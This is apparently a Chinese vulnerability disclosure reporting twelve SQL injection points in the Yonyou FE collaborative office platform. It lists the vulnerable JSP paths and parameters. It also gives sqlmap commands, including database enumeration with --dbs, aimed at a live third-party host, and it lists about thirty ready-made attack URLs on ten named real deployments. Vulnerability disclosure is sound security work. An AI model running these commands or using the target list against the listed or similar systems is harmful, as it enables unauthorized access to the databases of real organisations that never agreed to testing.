### 简要描述:
用友通用系统漏洞打包#1
### 详细说明:
看了一天的时间,把发现的漏洞一起打包了
总共包含用友FE协同办公平台通用系统漏洞打包,包含12个SQL注入漏洞,总不会都重复嘛
漏洞的文件及参数为:
```
/sys/left.jsp?lx=1
/sys/regUI.jsp?regName=111
/sys/regListUI.jsp?searchKeyvalue=111
/sys/plugin/plugin_form_edit.jsp?done=&key=a
/security/check.jsp?name=1&id=1
/sys/plugin/plugin_datasource_edit.jsp?done=&key=a
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync
/fenc/ncsubjass.jsp?subjcode=1
/cooperate/flow/selectUDR.jsp?id=1
/cooperate/flow/selectMUDR.jsp?id=1
/common/selectUDRTree.jsp?id=1
```
1)sql注入1
/sys/plugin/plugin_form_edit.jsp?done=&key=a
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a"
[<img src="https://images.seebug.org/upload/201409/052056317ff72fbdf3f56e2a55e6307c7a2434f7.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052056317ff72fbdf3f56e2a55e6307c7a2434f7.jpg)
2)sql注入2
/sys/regUI.jsp?regName=111
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111"
[<img src="https://images.seebug.org/upload/201409/052057550339e542168efa0d9188e0e1c748d67f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052057550339e542168efa0d9188e0e1c748d67f.jpg)
3)sql注入3
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
sqlmap -u "http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111"
[<img src="https://images.seebug.org/upload/201409/05210826a4dd2db85a1dfad7d0de306a1532d8f4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05210826a4dd2db85a1dfad7d0de306a1532d8f4.jpg)
4)sql注入4
/sys/left.jsp?lx=1
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1"
[<img src="https://images.seebug.org/upload/201409/052100252e1c44671ed2ad1d3ef884b40d9a5327.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052100252e1c44671ed2ad1d3ef884b40d9a5327.jpg)
5)sql注入5
/security/check.jsp?name=1&id=1
sqlmap -u "http://gzwnq.88ip.cn:9090/security/check.jsp?name=1&id=1"
[<img src="https://images.seebug.org/upload/201409/05210248cda8872620c6382c02c4bfc04ab85281.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05210248cda8872620c6382c02c4bfc04ab85281.jpg)
6)sql注入6
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
sqlmap -u "http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111"
[<img src="https://images.seebug.org/upload/201409/05210637952ca013bba900a61efb8f29edd77dd6.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05210637952ca013bba900a61efb8f29edd77dd6.jpg)
7)sql注入7
/sys/regListUI.jsp?searchKeyvalue=111
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regListUI.jsp?searchKeyvalue=111"
[<img src="https://images.seebug.org/upload/201409/052059140e808d2104f009b4567fda7dda7745cb.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052059140e808d2104f009b4567fda7dda7745cb.jpg)
其他的就不一一例举了....请检查。
给出10个其他案例:
http://220.168.210.109:9090/sys/regUI.jsp?regName=111
http://fsd2014.f3322.org:9090/sys/regUI.jsp?regName=111
http://oa.hzuf.com:9090/sys/regUI.jsp?regName=111
http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111
http://183.129.249.246:9090/sys/regUI.jsp?regName=111
http://116.7.241.29//sys/regUI.jsp?regName=111
http://oa.shunhengli.com:9090/sys/regUI.jsp?regName=111
http://oa.chnjcdc.com:9090/sys/regUI.jsp?regName=111
http://115.29.234.197:8090/sys/regUI.jsp?regName=111
http://119.145.194.122:9090/sys/regUI.jsp?regName=111
http://220.168.210.109:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://fsd2014.f3322.org:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://oa.hzuf.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://183.129.249.246:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://116.7.241.29//sys/plugin/plugin_form_edit.jsp?done=&key=a
http://oa.shunhengli.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://oa.chnjcdc.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://115.29.234.197:8090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://119.145.194.122:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://220.168.210.109:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://fsd2014.f3322.org:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://oa.hzuf.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://183.129.249.246:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://116.7.241.29//permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://oa.shunhengli.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://oa.chnjcdc.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://115.29.234.197:8090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://119.145.194.122:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
### 漏洞证明:
漏洞证明给出以下几个个案例:
证明1:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a" --dbs
[<img src="https://images.seebug.org/upload/201409/052109392e62bf80cd8567b288761c38d8b89ae7.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052109392e62bf80cd8567b288761c38d8b89ae7.jpg)
证明2:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111" --dbs
[<img src="https://images.seebug.org/upload/201409/052110476ec7998a4a03e947785adab54bb83c58.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052110476ec7998a4a03e947785adab54bb83c58.jpg)
证明3:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1" --dbs
[<img src="https://images.seebug.org/upload/201409/05211124de3bf0067c62fd3168b2d72f6f348fc2.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05211124de3bf0067c62fd3168b2d72f6f348fc2.jpg)
京公网安备 11010502034610号
暂无评论